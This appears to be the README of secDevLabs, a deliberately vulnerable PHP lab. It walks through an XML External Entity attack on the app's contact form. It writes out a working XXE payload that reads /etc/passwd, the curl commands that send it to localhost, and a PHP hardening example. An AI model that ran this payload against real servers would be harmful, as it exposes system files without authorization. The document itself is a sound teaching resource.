This is a simple PHP web application that contains an example of an XML External Entity (XXE) vulnerability. Its main goal is to describe how a malicious user could exploit it.
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, to reach internal file shares, and for internal port scanning, remote code execution, and denial of service attacks.
The main goal of this app is to discuss how XXE vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
To start this intentionally insecure application, you will need Docker and Docker Compose. After forking secDevLabs, you must type the following commands to start:
cd secDevLabs/owasp-top10-2017-apps/a4/vinijr-blog
make install
Then simply visit localhost:10080! 😆
To properly understand how this application works, you can follow these simple steps:
- Visit its homepage!
- Try sending ViniJR a message.
Now that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
After reviewing the inputs from the app, it is possible to identify that the section "GET IN TOUCH" allows users to send messages to the server, as shown in the following picture:
Using the Burp Suite proxy to intercept this request (a POST to contact.php) reveals that the message is built as an XML document (if you need any help setting up your proxy, you should check this guide):
To replicate this POST using curl, create the following file, payload.xml:
<?xml version="1.0" encoding="UTF-8"?>
<contact>
<name>RAFAEL</name>
<email>[email protected]</email>
<subject>YOU ROCK</subject>
<message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>
And run:
curl -d @payload.xml localhost:10080/contact.php ; echo
By checking the source code of the file, it is possible to see how this XML is loaded on the server side:
As no validation prevents ENTITY declarations from being sent to the PHP file, an attacker could create the following evilxml.xml to perform an XXE attack:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<contact>
<name>&xxe;</name>
<email>[email protected]</email>
<subject>YOU ROCK</subject>
<message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>
And, as the following picture shows, the attack succeeds and sensitive information is retrieved from the server that is hosting the vulnerable app:
curl -d @evilxml.xml localhost:10080/contact.php ; echo
How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
- Extract data from the server through the method shown above.
[Spoiler alert 🚨 ] To understand how this vulnerability can be mitigated, check out these pull requests!
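One way to close the hole described above, as an added example rather than the project's own fix or code from the pull requests. It assumes the handler parses the request body with PHP's DOMDocument; `parse_contact` and the sample strings are hypothetical and constructed for illustration.

```php
<?php
// Added example, not secDevLabs code. Assumes the message is parsed with DOMDocument.
function parse_contact(string $xml): array
{
    if ($xml === '') {
        throw new InvalidArgumentException('empty body');
    }
    // PHP < 8.0: switch the external entity loader off explicitly.
    // PHP >= 8.0 requires libxml >= 2.9, where it is off by default.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true); // keep parser errors out of the response
    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. LIBXML_NOENT and
    // LIBXML_DTDLOAD are deliberately absent: they enable entity substitution
    // and external DTD loading.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new InvalidArgumentException('malformed XML');
    }
    // A contact message needs no DTD: refuse any DOCTYPE before reading values.
    foreach ($dom->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new InvalidArgumentException('DOCTYPE not allowed');
        }
    }
    $fields = [];
    foreach (['name', 'email', 'subject', 'message'] as $tag) {
        $el = $dom->getElementsByTagName($tag)->item(0);
        $fields[$tag] = $el === null ? '' : $el->textContent;
    }
    return $fields;
}

// Constructed sample inputs: a benign message and the entity-carrying one from above.
$samples = [
    'benign' => '<contact><name>RAFAEL</name><email>user@example.com</email>'
              . '<subject>YOU ROCK</subject><message>HI</message></contact>',
    'xxe'    => '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
              . '<contact><name>&xxe;</name></contact>',
];
foreach ($samples as $label => $xml) {
    try {
        echo $label, ': accepted, name=', parse_contact($xml)['name'], PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $label, ': rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```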
We encourage you to contribute to SecDevLabs! Please check out the Contributing to SecDevLabs section for guidelines on how to proceed! 🎉